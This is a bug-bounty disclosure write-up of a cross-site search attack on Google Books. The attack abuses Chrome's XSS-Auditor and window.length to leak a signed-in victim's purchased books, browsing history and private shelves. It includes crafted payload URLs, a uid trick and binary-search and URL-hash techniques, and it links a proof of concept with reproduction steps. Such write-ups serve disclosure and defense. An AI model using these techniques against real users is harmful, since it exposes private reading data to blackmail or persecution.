Google books leakage

Summary

Leaking user’s private data such as purchased books, books browsing history, private bookshelves from Google Book website by abusing the XSS-Auditor and window.length.

Introduction

Recently, I have been looking for XS-Search [1] vulnerabilities all over Google. While testing Google Books, I discovered that depending on the results slight changes in the source code are being made. It looked like a good entry point for the XS-Search attack, indeed, by abusing the XSS-Auditor I managed to exfiltrate user’s private information by a prepared website.

When inspecting the source code of the page, I noticed that if there is at least one book being shown in search results a specific JavaScript code is inserted and that it doesn’t happen otherwise. The code starts with:
<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>", where <title> is the book title of the first record.

For a given <title> and user’s <uid> I was able to create a payload https://books.google.com/books?uid=<uid>&num=1&q=<title>&x=<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>" which if the query &q=<title> returns a record the window will be blocked by the XSS-Auditor (because of the “reflected” parameter xss detected) and won’t be otherwise.

Another observation I have made is that when the page is being blocked by the XSS-Auditor the window.length is equal to 0 (which means no iframes are embedded) and otherwise, it quickly becomes greater than it.

Having these observations allows the attacker to match the list of book titles and for each one to determine whether the victim ever “touched” that title. In the next sections, I will demonstrate a much more advanced attack which exfiltrates more detailed information.

Going further – uid=vulnerability

The main downside of presented in the previous section (#Introduction) attack is that the attacker has to know the victim’s<uid> which makes the attack much less wide. To extend it further I decided to test a few things out. Those experiments led me to the following observations:

https://books.google.com/books?uid=vulnerability - infinitely redirects to itself.
https://books.google.com/books?uid=%2B - redirects to https://books.google.com/books?uid=<uid>&hl=en.
https://books.google.com/books?uid=%2B1 - throws 404 response.
https://books.google.com/books?uid=1%2B1 - redirects to https://books.google.com/books?uid=<uid>&hl=en.
https://books.google.com/books?uid='&q=hack - redirects to https://www.google.com/search?tbo=p&tbm=bks&q=hack.
https://books.google.com/books?uid=vulnerability&q=hack - displays results for the logged user without changing the URL.

The behavior is super strange, but the last observation allows the attacker to perform XS-Search attack without knowing the victim’s <uid>.

Efficient attack

Thanks to #Going further–uid=vulnerability we already extended the attack very well but we are not done yet.

To begin the chapter, it’s important to mention that the results can be limited to one record by setting the query parameter num=1 and also can be accessed at any offset with help of the start=<offset>. It allows for searching through the library one title after another.

Also, by knowing the <id> of a specific shelf we can limit the results to match only the records from that container, which is done by setting the parameter as_coll=<id>. The default bookshelves have theirs <id> in range [0, 10] (e.g. Browsing History has as_coll=9) and the custom ones are incremental, starting with as_coll=1001. It allows the attacker to explore the victim’s private bookshelf .

Another key observation is that the attacker doesn’t have to bruteforce queries title by title. The XSS-Auditor can be tricked by providing multiple “reflected” parameters in one query ?x=<payload1><payload2><payload3>.. where if at least one <payloadN> matches the resulted code the page will be blocked. Because of it, the attacker can quickly find a match using algorithms such as binary search. The only mitigation here is the length of the URL limited by the server which can be easily bypassed with hash query #x=.. instead of ?x=... It’s because the hash part #x= is not sent to the server and there is a bug in the XSS-Auditor [2] making the Auditor search for reflection in those URL fragments as well. It also seems that the length of the hash part is pretty much unlimited - I successfully injected 500k characters.

Combining all the presented observations allows the attacker to obtain detailed
information about the victim in an extremely efficient way.

Attack scenario

A regular user of Google Books can have their private information leaked when visiting a prepared website. The leaked information consists of items such as Searched Books, Private Book Collections, Purchased Books etc. The attacker can use this information to embarrass, blackmail, threaten or even to draw legal consequences from the victim because a specific set of books can be banned in some countries (https://en.wikipedia.org/wiki/List_of_books_banned_by_governments).

Setup

I have created a proof of concept https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html but to make it fully working you will need:

Chromium-based browser with XSS-Auditor enabled
Two new shelves S1 and S2 with their <id> created (bookshelves can be created in My Library https://books.google.com/books?uid=<uid>&hl=en, obtaining <id> can be done just by watching the URL for as_coll=<id> after visiting the created shelf)
One book in S1 chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.html
Five books in S2 chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.html

Tested on newest Google Chrome - Version 71.0.3578.98 (Official Build) (64-bit)

Steps to reproduce

Visit https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html and click anywhere on the website.
Chose an option and fill the required fields with the information obtained from #Setup
Wait for the results

Behind the scenes

Upon visiting the website and making an action a new window is being opened. The former one will be used for further redirections.
Upon choosing an option:
2a. Have I touched that title?
- the request to https://books.google.com/books?uid=vuln&num=1&q=<title>&x=<xss> is being made in the background where <xss> is the payload mentioned in #Introduction
- the script watches for window.length change - if it changed to 1 it means that the <title> was not found in the victim’s library. Otherwise, after a fixed amount of time, the script will conclude that the page was blocked by the Auditor and hence the <title> was found.
2b. What ONE title have I chosen?
- the binary search is being run in the background based on halving the list of titles in each turn depending on in which half the title is included. The URL of the requests is https://books.google.com/books?uid=vuln&as_coll=<id>&num=1&start=<offset>#x=<xss>.
2c. What FIVE titles have I chosen?
- same as 2a but repeated 5 times.
Results are being displayed.